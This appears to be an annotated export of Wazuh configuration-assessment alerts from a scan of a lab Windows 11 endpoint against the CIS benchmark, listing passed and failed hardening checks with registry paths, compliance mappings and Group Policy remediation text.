data.sca.check.compliance.tsc: CC6.1,CC6.8,CC7.2,CC7.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\EventLog\\System'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off Data Execution Prevention for Explorer' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19008 Numeric ID of the detection rule that fired.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'AU.6'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.31.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['10.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gpg13: ['4.12'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr_IV: ['35.7.d'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2583879 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26311 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Turn off Data Execution Prevention for Explorer' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: Disabling Data Execution Prevention can allow certain legacy plug-in applications to function without terminating Explorer. The recommended state for this setting is: Disabled. Note: Some legacy plug-in applications and other software may not function with Data Execution Prevention and will require an exception to be defined for that specific plug- in/software. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Data Execution Prevention is an important security feature supported by Explorer that helps to limit the impact of certain types of malware. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\File Explorer\Turn off Data Execution Prevention for Explorer. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Explorer.admx/adml that is included with the Microsoft Windows 7 & Server 2008 R2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.31.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 10.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 10.6.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: AU.6 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gpg13: 4.12 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gdpr_IV: 35.7.d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.hipaa: 164.312.b No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.1,CC6.8,CC7.2,CC7.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Explorer'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off heap termination on corruption' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19008 Numeric ID of the detection rule that fired.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '2.2.4'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.31.3'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2587688 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26312 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Turn off heap termination on corruption' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: Without heap termination on corruption, legacy plug-in applications may continue to function when a File Explorer session has become corrupt. Ensuring that heap termination on corruption is active will prevent this. The recommended state for this setting is: Disabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Allowing an application to function after its session has become corrupt increases the risk posture to the system. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\File Explorer\Turn off heap termination on corruption. Note: This Group Policy path is provided by the Group Policy template Explorer.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.31.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 2.2.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: CM.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC5.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Explorer'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off shell protocol protected mode' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19008 Numeric ID of the detection rule that fired.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '2.2.4'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.31.4'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2590885 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26313 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Turn off shell protocol protected mode' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to configure the amount of functionality that the shell protocol can have. When using the full functionality of this protocol, applications can open folders and launch files. The protected mode reduces the functionality of this protocol allowing applications to only open a limited set of folders. Applications are not able to open files with this protocol when it is in the protected mode. It is recommended to leave this protocol in the protected mode to increase the security of Windows. The recommended state for this setting is: Disabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Limiting the opening of files and folders to a limited set reduces the attack surface of the system. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\File Explorer\Turn off shell protocol protected mode. Note: This Group Policy path is provided by the Group Policy template WindowsExplorer.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.31.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 2.2.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: CM.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC5.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Prevent the computer from joining a homegroup' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 26 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '7.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.36.1'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2594755 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26314 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Prevent the computer from joining a homegroup' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: By default, users can add their computer to a HomeGroup on a home network. The recommended state for this setting is: Enabled. Note: The HomeGroup feature is available in all workstation releases of Windows from Windows 7 through Windows 10 Release 1709. Microsoft removed the feature completely starting with Windows 10 Release 1803. However, if your environment still contains any Windows 10 Release 1709 (or older) workstations, then this setting remains important to disable HomeGroup on those systems. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: While resources on a domain-joined computer cannot be shared with a HomeGroup, information from the domain-joined computer can be leaked to other computers in the HomeGroup. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\HomeGroup\Prevent the computer from joining a homegroup. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Sharing.admx/adml that is included with the Microsoft Windows 7 & Server 2008 R2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.36.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 7.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\HomeGroup'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off location' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 27 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '2.2.5'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.41.1'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2598554 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26315 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Turn off location' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting turns off the location feature for the computer. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: This setting affects the location feature (e.g. GPS or other location tracking). From a security perspective, it's not a good idea to reveal your location to software in most cases, but there are legitimate uses, such as mapping software. However, they should not be used in high security environments. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Location and Sensors\Turn off location. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Sensors.admx/adml that is included with the Microsoft Windows 7 & Server 2008 R2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.41.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 2.2.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\LocationAndSensors'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Message Service Cloud Sync' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 28 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '4.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'SC.8'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2601768 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26316 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Allow Message Service Cloud Sync' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows backup and restore of cellular text messages to Microsoft's cloud services. The recommended state for this setting is: Disabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: In a high security environment, data should never be sent to any 3rd party since this data could contain sensitive information. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Messaging\Allow Message Service Cloud Sync. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Messaging.admx/adml that is included with the Microsoft Windows 10 Release 1709 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.45.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 4.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.hipaa: 164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: SC.8 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.1,CC6.7,CC7.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Messaging'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Block all consumer Microsoft account user authentication' is set to 'Enabled'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Block all consumer Microsoft account user authentication' is set to 'Enabled'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Block all consumer Microsoft account user authentication' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 29 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '8.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.46.1'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['5.3'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2604945 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26317 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Block all consumer Microsoft account user authentication' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This setting determines whether applications and services on the device can utilize new consumer Microsoft account authentication via the Windows OnlineID and WebAccountManager APIs. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Organizations that want to effectively implement identity management policies and maintain firm control of what accounts are used on their computers will probably want to block Microsoft accounts. Organizations may also need to block Microsoft accounts in order to meet the requirements of compliance standards that apply to their information systems. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft accounts\Block all consumer Microsoft account user authentication. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template MSAPolicy.admx/adml that is included with the Microsoft Windows 10 Release 1703 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.46.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 5.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 8.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\MicrosoftAccount'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure local setting override for reporting to Microsoft MAPS' is set to 'Disabled'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure local setting override for reporting to Microsoft MAPS' is set to 'Disabled'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure local setting override for reporting to Microsoft MAPS' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19008 Numeric ID of the detection rule that fired.
rule.firedtimes: 8 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '2.2.5'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.47.4.1'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2608665 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26318 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Configure local setting override for reporting to Microsoft MAPS' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting configures a local override for the configuration to join Microsoft Active Protection Service (MAPS), which Microsoft renamed to Windows Defender Antivirus Cloud Protection Service and then Microsoft Defender Antivirus Cloud Protection Service. This setting can only be set by Group Policy. The recommended state for this setting is: Disabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: The decision on whether or not to participate in Microsoft MAPS / Microsoft Defender Antivirus Cloud Protection Service for malicious software reporting should be made centrally in an enterprise managed environment, so that all computers within it behave consistently in that regard. Configuring this setting to Disabled ensures that the decision remains centrally managed. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\MAPS\Configure local setting override for reporting to Microsoft MAPS. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 8.1 & Server 2012 R2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.47.4.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 2.2.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Join Microsoft MAPS' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19008 Numeric ID of the detection rule that fired.
rule.firedtimes: 9 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '2.2.5'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.47.4.2'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2612831 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
